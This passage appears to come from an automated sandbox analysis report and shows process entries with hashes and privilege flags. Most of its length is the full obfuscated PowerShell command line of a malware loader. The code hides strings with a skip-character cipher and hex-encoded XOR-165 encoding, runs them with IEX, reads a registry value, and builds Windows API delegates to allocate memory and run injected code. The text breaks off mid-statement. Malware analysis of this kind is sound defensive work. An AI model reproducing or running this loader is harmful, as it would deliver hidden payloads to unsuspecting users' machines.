Lo'Ne8ku1MeEFoDchCac4diDSaCBeCNoBBlCBa0PrDZa6Fo8Br5Se9Bo8Fa8Un5LdFPrESiEFa4AnDmi5HeDWe5WaEHo1PrCReAOpCYa8HeCIn4ReCBoCPeCEmBFrFSt8An9CoFUn9SpFSlESt6neDOl0AuDfl7InDOa7JeCSk0FaCUnBCoDTo1GrEsp1SnCLaATiCSo8DaCNa4EmCUnCStCcyBCy8RaBStEFl1ReCSe0PhCRa3PiCSyCStCKoBVaCSa0AuEJe1AiDEmCThCSnBVaCJu4BeCEx8ReCSoCPlCCi6BoEVa4HaDFe6KoDFa6UnCit0KeCTi8HaCWi7GrCUd9GrDDoCMo8VaDCa8rgDToEHaBLaCSu0DeDSt2Ln8ne8PhECrAPeCja7PhCsvFChCSt0ChCBa6AuDMa1He8Sh5UdFLo6SoDSaCtyDLa6PhDSy1TrCKo0HaCSp8Gu8InBSeFPe7CrCKk0DiCEm3siCSo9ReCEg0DeCSa6maDBl1VaCCaCBuCObAKrCUnBBr8CiBLtEDr4FiDIc6TsDIn6RuCCa0SkCSy8UrCGe7WoCWe9BrDCeCStEBlBAmCCo4BoCUd8WiCSk0Ch8UdDTi8Hy1OsEUn3FlCFlALyDBe7KrDsk6baCOvECaCPrBOvCUdCAnCReBUnCSr2SuDBa6CaDCo7ZoCBr0GaDDe6yoDRe0BaCUl9YaDFi1DeCBe4ReDAr1AlCAn0OrDUv7UnDsl6Kl9HuDMe8FuCCy8KaCBr8na9Pr8Hv5FaFBeESaFar6EyDGiCFrDHa6LaDmu1ReCfe0ruCUd8Ko8FaBKaFme7UnCUn0AfCAn3GlCKo9KoCMa0GoCRa6CuDSl1InCSuCHyCUnAcoCFjBEs8BrBPoEKo0vaCFl8MiCOpCSkDGr1Me8SoBMiETh4AlDTo6CaDco6maCwa0hyCpo8phCos7ChCFe9GrDCaCInEAt7foDPa0PrCNoCSkCKa9ArCTj1TyCSu0DiDCr7DiESh4UpCBe6UnCTe6StCSy0adDHa6SkDSu6NoFBe8po9InFBe9SnFBaFEl7ReDbr0LeCMiBPi8UdCDo8ReBNoEUm1StCAp0peCAm3AmCMyCpaCTyBAnCLa0FoEIl1DeDStCOpCSlBNeCWa4StCKo8VoCsnCbuCUn6OkEEn8FuCOrAOrCLi1nuDSr0DiCBi9PaCOp0Su8CoDDa8Ta1ReEKu3MyCheASmDTr7MuDAr6SaCSpEPiCErBStCdaCStCSkBMaCIm2ArDAd6SeDSp7MaCKr0UnDFy6EcDGo0PoCSu9ElDEn1GlCSn4TuDAb1DiCMi0foDOv7MeDIs6Ma9MeCBu8Pr9In8Uo5St8Ly1KaCDe3WaCMu4CeCDr9BaDso6UnCSe0qu8DeCOt8EmBKeEAt1HoCFa0HeCKa3krCBuCBaCSeBHoCAu0DoFVr1MoDOvCLoDDi5OvCMe0Pr8SeDKa8Pr1OdEBl2SoCatDBrCCu0InCTi2foCDeCUnDUn6UbCLyDMi9Di5Sm8Pe9St8Gr5Su8En1DaEEo2FiCBrDVaCga0miCCh2BrCAdCkeDMe6OuCPhDCo9Wi4Ud8Fo9In8Un5AnFSpESkFTy6InDfaCFrDTr6AsDGa1PeCIn0AbCTe8Te8IsBAmEFe8PuDOu0JaCOp9BeDBi1vaCPrCNeCAs6NoCYe4puDGe6PoDdk1ErEma1NeCOv0BuCDe9hjCKo0EnCHj2GaCJe4LuDBr1crCAf0AsFSv8Sa8InCMg'Tr;An&Vi(vu`$paGEqhsoeTugAdiTrsNohPr7Ad)sm Hu`$BoHCooBoePrrCaeSvsSy2La;Pr`$AtHDroLaeAlrUneKasSp3Re Ru=Ps LnSKomSaeTirMytHjeKonEasFobOxaRirBlnTasTa0Gu Pe'Ti8Ar1CoEStDBeCst4ReDgeCLaCOsBExCUn0RkDMo6De8DyBGiEDo1SeCan0DiCUn3TrCurCAuCOvBSyCGn0SiEda6DaCMiAMoCUnBUnDQu6UnDBe1IsDBr7GaDTu0noCha6HvDBr1ReCTaABoDAx7St8GhDRi8Me1MaEWa3SuCSyASaDTy7KoDMu6BoCSkESyCFoBScCFaCIcCPaBToCin2CaDCh6KlDAn7MaCFo0VaDCl6koDMu0UdCel9AlDUn1ReCAd4BaDLu1GuCBr0FrDMi7KoDUn6Re9To3Op8hv9St8Fo5DmFKlESaFBr6FoDUnCHyDCy6RaDpe1HoCro0SpCPr8St8DrBBoFGa7haCTo0MuCMi3MoCbr9CaCSo0SeCWe6GrDAn1MoCWiCShCEnATiCEsBOo8ElBTiERi6ErCPr4BeCAs9AnCDi9MaCBiCLoCFoBStCIc2UnEDe6SyCOvAAnCStBSpDkl3DrCSt0RiCTeBPaDIs1ReCDeCScCsaAKvCSpBIlDHe6GyFps8pl9AdFCa9geFAcFEg6SvDLe1HeCLo4VaCUnBYaCLe1FrCCy4MeDSe7InCPl1Ba8Di9Of8Pe5Sc8El1PhEKaBAvCLiABuCefBOfCSo1udCGl0FrCta6BeCSpABeDLi7alCSpASuDSt0HoDFa6BlCCo9TiDSuCPo8JaCKo8AaBTaFCr6SmCDo0DrDLi1GrEgrCBlCSp8PiDBe5VeCMi9SuCMe0elCGr8beCSt0NoCOxBSqDKv1CaCSe4VrDco1JiCLeCdrCSwASuCSeBFeEMo3RuCCo9InCLu4SoCKr2KaDTi6Sh8StDCh8Sa1NoESk3BuCChAaeDHe7IvDSk6FaCSaEReCRoBruCLoCnoCCuBKrCSp2PaDCo6SoDSa7IdCre0EjDka6AxDUn0SeCSu9CaDBe1JoCNa4HeDRu1NoCge0SpDIn7TeDno6Bo9Sp2Lo8ThCVr'In;Fr&No(Cl`$MiGorhtweStgTeiBysFahta7Ph)Ha Be`$coHNooIseRerGreDusPa3Se;Uf`$AfHHuoSceUnrSaeResMo4Su Ma=Re PhSSpmBaeFarTrtaeeScnInsInbIaaThrAnnResUn0Ev An'As8Tr1MaEYnDOpCGo4HeDUdCSpCGaBraCMa0HaDBy6En8VaBPoEBo1miCMa0SkCLa3PhCKuCDrCVeBKoCPu0StEOm8MbCFo0SaDHo1CoCMeDKoCAdAUnCSw1Fo8EfDGr8St1KlEUd2MuCHaDDeCpo0NiCFo2AfCStCViDGr6TeCSmDEr9Br7Co8Al9Ro8ch5De8di1AdEUn2SoCUrDEuCPo0BlCpi2CiCLnCTiDre6BrCAmDNe9Mi6Be8Bi9Es8Kl5In8An1DoEBe6MiCInAShCPa0MeCBr9BeCSiCBaCSmAAfCmj8KoDPrCSlCTa4ViCUd9BrCCe2weCPaCGrCBr4Dr8Sk9Tr8Un5Ch8re1PrECuBGdCHeABeCSmBMiCde1GrCSt0ZoCNe6PuCBnASkDFe7GrCHyATvDFo0InDNo6anCCy9EjDRiCFl8ToCTo8RiBAmFMe6FoCGa0VoDTa1DyEPoCanCCo8BeDBr5LyCBo9SvCPu0SyCTa8MiCCa0KoCStBKlDGr1LuCAs4ReDNo1CiCNsCLaCStAOrCunBEgEGi3ReCFi9TrCBe4unCFr2MaDOb6Ex8CiDSc8Ha1NoEUn3enCBrASlDMr7klDUr6BaCHaEMaCBiBLaCTaCMiCKoBDoCHa2PrDSl6KrDLe7GtCCo0ApDSy6FoDKv0RyCBi9DiDFr1RaCTu4PuDFr1TaCFo0ApDSu7GoDWe6Pr9In2Mo8BuCIr'Sn;Ma&Se(Fy`$OuGdrhOpeStgVeielsTuhNo7De)Hy Ph`$EfHPeoDieOvrbueHysSh4Gr;Ej`$JuHAnoBaeGrrkoeGasTa5Ca Ba=Lu UlSfrmBreHorAftTieWrnLisPlbBuaMerShnTrsKv0Ko li'OvDPe7InCrg0OuDDi1AlDTr0ApDRe7AnCAfBIn8Sl5St8Vi1PrEExDskCHa4OpDHiCLyCStBNeCSa0SaDSt6Rg8DoBDiEFo6ViDMo7DyCBo0PhChj4YaDTa1ubCSk0KnFUd1BeDhjCDuDLi5StCSj0Ov8LeDDe8KrCHa'Rg;st&An(Ko`$StGafhBoeOpgOpiFosBrhKa7Re)Sp ol`$OpHWaoPeeZarMueFisPr5Co Se Kn Fa;Le}Fo`$faURenLocFrobruObpAilHaeEn Aa=Ko FrSMomobeAbrDitBreManMasDebfoaAbrInnFesKh0Ke Ve'ReCGsEEmCte0MuDun7YoCArBUnCPa0TeCGo9ar9Ar6ra9Af7di'De;Gr`$PrHUnoYoeEfrAdeKosPl6Sy Gr=Du MaSplmgeeBirSptUneFrnPosFobSoaDirDynAfsJu0gr Tv'Au8Na1EtFBr2LaCFl0koDTr7DuCCa0UnDSk7CaCPl4brDFi1Br8Ba5eu9Ut8Dr8Gu5fiFMaEdaFFi6ToDBeCVeDWo6ChDme1VoCUn0ShCAi8Sl8UnBAnFMb7InDDv0DdCTiBEnDPu1LnCMeCGaCdi8VoCKo0Ek8saBStEinCauCGeBGaDNo1ImCPh0BoDBa7PtCOsAChDSp5SkFMa6BrCTi0SkDFl7FiDFl3WiCUdCTrCSp6DeCRe0TaDKe6Ma8s BExECa8PrCSw4TeDFo7IdDFe6PaCLeDSoCVi4DiCRi9FaFGe8Sq9TuFHo9MaFGoEsa2FuCAl0LeDSj1InEHo1CoCSk0BoCPa9UnCAf0FuCpa2SpCCy4AfDup1BeCOv0FjEgu3TrCOlAUnDNo7acEKi3JoDWa0NaCDaBBaCSe6PrDSa1BeCfrCHiCudATrCSoBMyFPe5OvCMeAUpCGaCVeCopBPaDLu1UsCde0FlDhu7Sv8VeDBe8UnDBuCUg3GuCAfEHyDPi5Ur8Ne5ls8Mb1FoFAk0StCkuBWoCAa6TrCBaAUrDDr0MoDFs5MeCJu9GiCUn0Di8Of5Gt8Sk1BiEPr2DdCUdDHyCKo0UnCEu2ExCAeCSeDBl6ChCTiDQu9Dr1Ab8TeCPr8Cr9Go8As5Pl8OvDDiEPe2SpEIn1ScFEn1Wo8Va5KaETr5Ca8OmDGiFstEinEJaCUnCScBDiDUr1syFAn5WoDSt1KoDbo7ReFPr8Ln8Co9eq8Pr5ImFPrEHyFAc0ExEReCAmCsiBCoDFr1Ps9Be6Pi9Ti7VaFMi8Pa8Ov9Po8Mu5BlFPeELsFDe0MoEapCHvCAmBBlDOp1Ek9de6Ge9Un7TeFTi8Op8Ex9In8Hv5HaFSnEGaFHj0exEFiCcoCSyBSwDFl1Vi9St6St9St7RiFNr8Tm8BiCLo8Sk5Un8BaDLaFTrEReEdoCStCBiBMaDTr1AcFSi5BoDDe1NiDCo7BlFSa8Hy8SpCSe8ArCBi8EdCHi'Tr;Fe&In(na`$InGArhCaeungiriElsUnhSh7Ju)Om Di`$AmHeeoFoePrrAdeRusVi6Po;Fi`$ReDOkmEdnEniMonSkgMasFopPrrCyoLajEgeBukBetTrebarCo In=Ch FofPrkBapha Sc`$ReGGehIneNagIliPesNehPr5Un Re`$HuGObhBieStgKviNosFohPs6Re;La`$EkHreoFoeTirBoeGasPu7Sv Re=Ch KrSTemPreIkrUntVoeGenPesDibToaUtrSanHjsAp0Fo Or'Ri8mi1GgFHd6PrDSa0MeCSyEPaCseEInCde0CiDRh7KrCCoALiDGe3FiCfr0ShDEn7HyDTo1DrDIn7BeCCeEReCKaEReCSo0SkDti1AfDAf6Ta9Ov6Le8Ud5Et9Fi8Sp8ka5Dy8Yo1JoFSp2FoCSy0HoDIn7UlCMa0BoDSi7reCSe4DaDTe1Fl8TiBVaEIfCCrCKaBTrDPo3opCUvAHeCLaESeCSq0Un8TrDUnFUnEOrEReCBaCPaBvaDRe1beFNo5KoDPo1RuDEl7ViFBu8Fa9PsFEt9TeFToFcoFSpCKo0OvDSc7BrCOuABa8Ur9Om8Se5Un9An6Re9Fa0It9LtCMe8Se9Sl8Fl5Me9Pe5SkDUnDFe9Va6Pa9Kb5Kl9Bo5Ha9Fo5Pu8Sv9Bj8St5Un9Ci5PuDLaDQu9Co1Po9Ud5Va8TuCTi'Ch;an&de(Fa`$UnGCohAneLagOpiThsObhUn7Sn)Al Di`$GaHFroEneHorVgeTasSt7Si;Ha`$TiHOvoLaePurPaeGasKo8Ti In=Ha DrSKumNeeHerHytSheDenHesHobEkaArrPenRisDi0Co Af'Pe8St1UnEPa6CrCstABeDIn7seDPa7ClCWhAKeCTy7NiCSe7KvCMeAExDth7BaCDu0UnCSe0Sp8An5Ga9Pr8Ud8Om5Su8ga1QuFFo2leCSe0TeDGa7BoCRa0BeDWa7SpCSk4IgDUn1Ca8RiBafEKrCUtCJuBSuDTi3PrCRuAAsCTrEEuCSk0Un8DeDMoFSoEKuEEsCOmCCaBSuDDo1CoFBi5UbDFl1MoDUn7InFIn8He9HaFFo9DeFmaFChFErCPr0SaDPo7AlCFrAWa8Bi9Ta8Ch5Ap9Sl5KbDKiDPh9Te4Fe9No5re9Bn5Lg9Sl5Ow9An5Sk9Gy5Es8Am9Va8Su5Au9Bu5etDLoDPr9Pa6Or9Af5Fi9Ru5Ca9Ca5Uu8Si9Sp8At5Ha9Un5KaDBaDTu9op1De8tiCFl'Re;Ko&Sh(li`$NaGAnhPeePrgCoiHusSphUn7Sa)Ro Hi`$TeHstoSpeHirLaeBesSa8po;Un`$PrCRuaSyrNotLawVorThiStgCahArtUniGenFlgBe=Pa(SmGUneIntCo-OpIKltpeeTemWaPUnrSooInpDoeAgrSotKayBa Ma-SePbeaSptRehOx Bi'GoHPrKNeCPlUBi:Fo\LyPBasUdeInuRadSaaFemhobGauOnlLoaTpcParStualmSk\CykVeoRenFesXmtSqiAntSeuSttTaiUtoLunLseJelFe'Ge)Di.WaBTijHgfHesFo;Ly`$InHFloHoeMerSkeAasAn9Bl Op=Pa HoSJvmBreNerSktNoeJanKrsPabHeaTrrronYosUn0Af St'Ha8Fo1PaECuDSwCMeAFiCHe0AcDCe7ReCSe0MiDSt6Rg8Wa5Af9Mu8Ob8Pi5NoFVaEInFIn6UnDseCTuDSp6DaDWe1ChCNu0MiCGu8Ku8DeBNeEUn6AlCPlADeCSmBExDCh3PeCEv0SeDKa7crDHi1ToFTe8Sk9RdFAn9PhFFrESa3DrDAn7CeCImAHaCAn8MaENo7unCFo4UnDsk6BaCFe0Re9Ti3Fl9Fj1KaFAn6BuDSy1EnDDo7FrCLaCPoCBlBSkCPr2Re8EnDsy8Ln1AdEPi6EvCLa4kjDSl7TaDPa1OtDFi2PsDLa7NyCVeCSaCMu2SkCBeDBuDji1SkCEfCviCJaBSpCPr2Op8TaCBe'Bu;ha&He(Mi`$esGAnhNoeBlgChiShsLohFo7Sh)Ja St`$WiHMeoLaeBarBleHasCo9dv;Ty`$FrCGoagerSotFowDerLaiHagmihbetkoiPenSsgAn0Bn Ba=Ca ChSSamLoeAcrNatdueApnpasSabGaaGorBonSvsPr0Ya Bi'PoFCeEElFag6EkDDiCRaDCo6TeDAl1OvCvi0MeCRe8Sk8UdBAlFEl7FoDBl0CoCAaBAnDTr1PrCTrCFoCHe8TiCHu0or8UnBHrEstCKeCCyBTeDBo1VrCIn0meDPu7AiCItAPrDTu5RuFBe6FuCDe0FlDAn7OuDSl3LeCMaCPiCDi6DiCSo0UnDBo6Ve8syBBrEMe8EpCZo4StDSe7SaDSl6PeCElDDeCEl4HeCMe9KoFPr8Op9unFWo9GlFBlENu6FoCPaASpDma5ToDRuCSt8FlDAu8Pa1GaEOuDcuCEkACaCBu0IvDLi7KrCEl0GeDAb6Va8Is9Fa8Pa5Ko9To5Pa8Ol9Hy8Sm5Se8Ta5Fu8Be1DrFFu6MdDOv0klCUnEDiCUnEArCLi0PlDTe7trCGiASlDBa3AgCSt0puDAr7SeDCe1baDPy7prCKlEfeCJuEElCRd0TaDBa1GiDUd6Af9dr6Pe8Fe9Ja8af5Ga9Ka6as9Im0Po9AnCPa8MaCOr'in;Tr&An(Ud`$GaGWhhFleFlgReiOpsSchSa7Ov)sp En`$PrCPraBerRetSuwLerSmiUngPrhHatUniDinIjgSt0Ov;pr`$NeNMaoSonOscStoStnCrdGoiEnmEneblnSytGo2De=Ub`$LiHUloTreDirSaeFosUn.WecFioLauAnnOutMa-pi3Sm5Re9Ur;Sk`$paCBeaTorFotExwSirYaiSngmihGatKoiBankngTr1Em Ba=Bu UnSMomSgeSurRetRueFanCasTwbAmaFrrGanSusBi0St ar'AuFKoELoFev6AsDHyCNoDNa6UdDNi1BaCSt0WiCMu8Ve8ClBmuFPy7UnDBu0HyCemBStDPe1GrCopCpaCCa8CaCSc0Re8LsBHuESaCWoCPlBDiDHa1CoCpa0HiDMy7NoCSpApaDUt5CaFBo6DiCAn0MaDDe7SeDFi3UnCreCHuCBi6sqCPl0MoDhi6Ou8BuBSaESe8ThCPr4ViDKu7SnDCy6BeCNoDLaCCh4MiCFe9NiFPa8An9TaFPo9KaFReEFo6SeCWhADoDOu5NoDHoCPe8ReDTr8Sp1DrEvaDNeCbyAFoCCa0spDAs7GiCSp0UnDTo6Sk8fj9Sa8In5Ge9Sa6Fe9Ur0Th9ThCDk8cu9Co8Ba5Ov8Su1LoEDe6ruCOrApiDkl7CoDDe7SuCbuACiCHy7afCHi7GaCLuAEkDTu7UnCPi0PrCEk0Pa8Pi9Un8La5st8ud1SkEAnBChCEnASkCDoBTmCVa6ViCTeAJuCFaBVaCSt1KaCunCKiCaf8MoCMa0SeCMeBPlDSh1Et9be7In8RoCHa'Vo;Mo&Br(Tr`$FlGRehReeAigFeiTesgahPh7Wh)Fo Sh`$TeCcoaInrRetUdwForEfistgYahIbtspiUdnFagSo1St;Ed`$FrCPraNorSmtPewStrKliBdgKohCotEniPonFigAn2ba St=do stSPrmUneimrRetAdeClnStsKobBuadirDinHosDi0Tr to'Su8Br1AnCRoEfjCNo9VuCSa4MiDZo7StCFl2UkCWeFPrCSkAStDSl7WiCUn1BoCMi0Br8Bn5He9Sk8Vi8Ka5BaFInEBlFAj6InDDoCudDCi6AnDSl1InCSt0InCSy8Le8AyBTiFce7AsDNo0DeCImBAlDNo1NiCBiCSlCTi8VoCSe0Fu8ReBGaEnoCDeCOmBChDMe1TeCMa0BaDus7KeCPeAWaDFe5clFFo6BuCLa0ReDDe7NoDJe3StCHyCAlCSt6SkCDi0BeDMe6bl8AnBkoEEt8AfCAc4TiDBa7DrDSt6AhCSkDGiCLi4NoCFu9AsFSp8uj9ReFDi9RoFSuEBa2ApCKo0unDGr1HiEFi1GrCGu0diCPe9KoCJa0DeCFr2ReCUn4phDmu1DaCEp0MiEDe3ubCJoAReDbl7vaEma3SkDBa0ToCPsBSkCTy6reDPo1GhCDeCMaCTeASkCTiBUdFFo5UnCWeAEuCHoCLaCTrBAnDEr1AlCMa0ThDCh7Hi8coDfo8un1GeFTr6KeDAd0PaCPeESkCBoEhaCEk0noDRe7AeCPeAMoDGu3UnCTe0DiDim7RaDCa1HeDud7PeCTiEInCCoESiCMo0NoDSh1JoDBu6Oo9Vi6Ha8Cr9Ro8An5Tu8UvDinEKo2VuEAr1ouFLe1De8Co5PlESy5Se8CaDtaFDyEFdERvCBaCPhBBgDTo1PuFKa5UnDla1UlDJo7ToFSu8An8Sv9UnFSpEMeEDeCRaCAfBKoDAp1AfFVe5beDUn1UnDAl7DsFSc8Du8CoCLo8Ca5Kv8SnDFrFCuEElFQu3HeCPaAPrCRoCTrCIn1HaFTa8Ma8BiCIt8GuCOv8AbCMu'He;Re&St(Gr`$SpGSihBeePrgSpiFasTehJu7Ga)Gr Un`$ChCtralerHotRewUnrTeibigUnhEstSkiNonStgGa2gu;Ma`$BiCPiaUnrUntOuwAdrUniUngElhTitDiiStnMogDa3Fl Br=Li TiSCemSaeAsrBotmaeRenDesgebkyaMorFlnStsHj0Sy Mo'Gr8Wi1saCReEfiCTy9TuCTi4TiDpe7riCDm2TeCOpFMaCFrAKrDSe7GrCKr1CiCIn0Le8BaBTaEMiCcoCKrBKeDFa3DiCBrAkaCTrEBrCFu0Hj8DiDAp8Go1LoEje6ReCOmAVeDKn7FoDBo7ReCGbAOnCDe7SlCOp7HaCRaAFeDQu7PsCMe0GrCmy0Sk8Si9Ko8Et1MaEac1NoCPl8BlCBrBTbCGaCFoCVrBCoCUn2BiDPs6HeDBr5ZoDAc7WhCChACoCSpFLsCGh0BjCUsECoDLa1stCma0inDSp7Gl8SaCMa'Di;Ph&Bi(Al`$DeGAmhGreGigSkiAmsFohSa7Me)Mo To`$FaCShaMarSvtFlwDirKliBrgMahcitnaiTrnFogSu3Ta#Ga;""";;Function Cartwrighting9 { param([String]$Regionsplanlovs); For($Klistringer=2; $Klistringer -lt $Regionsplanlovs.Length-1; $Klistringer+=(2+1)){ $Smertensbarns = $Smertensbarns + $Regionsplanlovs.Substring($Klistringer, 1); } $Smertensbarns;}$talose0 = Cartwrighting9 'CeIFoEReXPr ';$talose1= Cartwrighting9 $Vildmnd;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $talose1 ;}else{.$talose0 $talose1;}
                    Imagebase:0x7ff7287a0000
                    File size:452608 bytes
                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Reputation:moderate

                    Target ID:3
                    Start time:15:50:34
                    Start date:01/12/2022
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7b44d0000
                    File size:875008 bytes
                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Target ID:4
                    Start time:15:50:36
                    Start date:01/12/2022
                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):
                    Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Smertensbarns0 { param([String]$Regionsplanlovs); $Delintervallernes = New-Object byte[] ($Regionsplanlovs.Length / 2); For($Klistringer=0; $Klistringer -lt $Regionsplanlovs.Length; $Klistringer+=2){ $Delintervallernes[$Klistringer/2] = [convert]::ToByte($Regionsplanlovs.Substring($Klistringer, 2), 16); $Delintervallernes[$Klistringer/2] = ($Delintervallernes[$Klistringer/2] -bxor 165); } [String][System.Text.Encoding]::ASCII.GetString($Delintervallernes);}$Forskningsresultaters0=Smertensbarns0 'F6DCD6D1C0C88BC1C9C9';$Forskningsresultaters1=Smertensbarns0 'E8CCC6D7CAD6CAC3D18BF2CCCB96978BF0CBD6C4C3C0EBC4D1CCD3C0E8C0D1CDCAC1D6';$Forskningsresultaters2=Smertensbarns0 'E2C0D1F5D7CAC6E4C1C1D7C0D6D6';$Forskningsresultaters3=Smertensbarns0 'F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3';$Forskningsresultaters4=Smertensbarns0 'D6D1D7CCCBC2';$Forskningsresultaters5=Smertensbarns0 'E2C0D1E8CAC1D0C9C0EDC4CBC1C9C0';$Forskningsresultaters6=Smertensbarns0 'F7F1F6D5C0C6CCC4C9EBC4C8C08985EDCCC1C0E7DCF6CCC28985F5D0C7C9CCC6';$Forskningsresultaters7=Smertensbarns0 'F7D0CBD1CCC8C08985E8C4CBC4C2C0C1';$Forskningsresultaters8=Smertensbarns0 'F7C0C3C9C0C6D1C0C1E1C0C9C0C2C4D1C0';$Forskningsresultaters9=Smertensbarns0 'ECCBE8C0C8CAD7DCE8CAC1D0C9C0';$Ghegish0=Smertensbarns0 'E8DCE1C0C9C0C2C4D1C0F1DCD5C0';$Ghegish1=Smertensbarns0 'E6C9C4D6D68985F5D0C7C9CCC68985F6C0C4C9C0C18985E4CBD6CCE6C9C4D6D68985E4D0D1CAE6C9C4D6D6';$Ghegish2=Smertensbarns0 'ECCBD3CACEC0';$Ghegish3=Smertensbarns0 'F5D0C7C9CCC68985EDCCC1C0E7DCF6CCC28985EBC0D2F6C9CAD18985F3CCD7D1D0C4C9';$Ghegish4=Smertensbarns0 'F3CCD7D1D0C4C9E4C9C9CAC6';$Ghegish5=Smertensbarns0 'CBD1C1C9C9';$Ghegish6=Smertensbarns0 'EBD1F5D7CAD1C0C6D1F3CCD7D1D0C4C9E8C0C8CAD7DC';$Ghegish7=Smertensbarns0 'ECE0FD';$Ghegish8=Smertensbarns0 'F9';function fkp {Param ($Upgrown, $Depressionsperioder) ;$Hoeres0 =Smertensbarns0 '81EED7C8C8C0D7C0CB8598858DFEE4D5D5E1CAC8C4CCCBF89F9FE6D0D7D7C0CBD1E1CAC8C4CCCB8BE2C0D1E4D6D6C0C8C7C9CCC0D68D8C85D985F2CDC0D7C088EAC7CFC0C6D185DE8581FA8BE2C9CAC7C4C9E4D6D6C0C8C7C9DCE6C4C6CDC08588E4CBC18581FA8BE9CAC6C4D1CCCACB8BF6D5C9CCD18D81E2CDC0C2CCD6CD9D8CFE8894F88BE0D4D0C4C9D68D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6958C85D88C8BE2C0D1F1DCD5C08D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6948C';&($Ghegish7) $Hoeres0;$Hoeres5 = Smertensbarns0 '81E6CDCCC9C985988581EED7C8C8C0D7C0CB8BE2C0D1E8C0D1CDCAC18D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6978985FEF1DCD5C0FEF8F885E58D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D696898581E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6918C8C';&($Ghegish7) $Hoeres5;$Hoeres1 = Smertensbarns0 'D7C0D1D0D7CB8581E6CDCCC9C98BECCBD3CACEC08D81CBD0C9C98985E58DFEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3F88DEBC0D288EAC7CFC0C6D185F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C38D8DEBC0D288EAC7CFC0C6D185ECCBD1F5D1D78C89858D81EED7C8C8C0D7C0CB8BE2C0D1E8C0D1CDCAC18D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6908C8C8BECCBD3CACEC08D81CBD0C9C98985E58D81F0D5C2D7CAD2CB8C8C8C8C898581E1C0D5D7C0D6D6CCCACBD6D5C0D7CCCAC1C0D78C8C';&($Ghegish7) $Hoeres1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Nondecorously,[Parameter(Position = 1)] [Type] $Coeliomyalgia = [Void]);$Hoeres2 = Smertensbarns0 '81EDC4DCCBC0D6859885FEE4D5D5E1CAC8C4CCCBF89F9FE6D0D7D7C0CBD1E1CAC8C4CCCB8BE1C0C3CCCBC0E1DCCBC4C8CCC6E4D6D6C0C8C7C9DC8D8DEBC0D288EAC7CFC0C6D185F6DCD6D1C0C88BF7C0C3C9C0C6D1CCCACB8BE4D6D6C0C8C7C9DCEBC4C8C08D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D69D8C8C8985FEF6DCD6D1C0C88BF7C0C3C9C0C6D1CCCACB8BE0C8CCD18BE4D6D6C0C8C7C9DCE7D0CCC9C1C0D7E4C6C6C0D6D6F89F9FF7D0CB8C8BE1C0C3CCCBC0E1DCCBC4C8CCC6E8CAC1D0C9C08D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D69C898581C3C4C9D6C08C8BE1C0C3CCCBC0F1DCD5C08D81E2CDC0C2CCD6CD95898581E2CDC0C2CCD6CD948985FEF6DCD6D1C0C88BE8D0C9D1CCC6C4D6D1E1C0C9C0C2C4D1C0F88C';&($Ghegish7) $Hoeres2;$Hoeres3 = Smertensbarns0 '81EDC4DCCBC0D68BE1C0C3CCCBC0E6CACBD6D1D7D0C6D1CAD78D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6938985FEF6DCD6D1C0C88BF7C0C3C9C0C6D1CCCACB8BE6C4C9C9CCCBC2E6CACBD3C0CBD1CCCACBD6F89F9FF6D1C4CBC1C4D7C1898581EBCACBC1C0C6CAD7CAD0D6C9DC8C8BF6C0D1ECC8D5C9C0C8C0CBD1C4D1CCCACBE3C9C4C2D68D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6928C';&($Ghegish7) $Hoeres3;$Hoeres4 = Smertensbarns0 '81EDC4DCCBC0D68BE1C0C3CCCBC0E8C0D1CDCAC18D81E2CDC0C2CCD6CD97898581E2CDC0C2CCD6CD96898581E6CAC0C9CCCAC8DCC4C9C2CCC4898581EBCACBC1C0C6CAD7CAD0D6C9DC8C8BF6C0D1ECC8D5C9C0C8C0CBD1C4D1CCCACBE3C9C4C2D68D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6928C';&($Ghegish7) $Hoeres4;$Hoeres5 = Smertensbarns0 'D7C0D1D0D7CB8581EDC4DCCBC0D68BE6D7C0C4D1C0F1DCD5C08D8C';&($Ghegish7) $Hoeres5 ;}$Uncouple = Smertensbarns0 'CEC0D7CBC0C99697';$Hoeres6 = Smertensbarns0 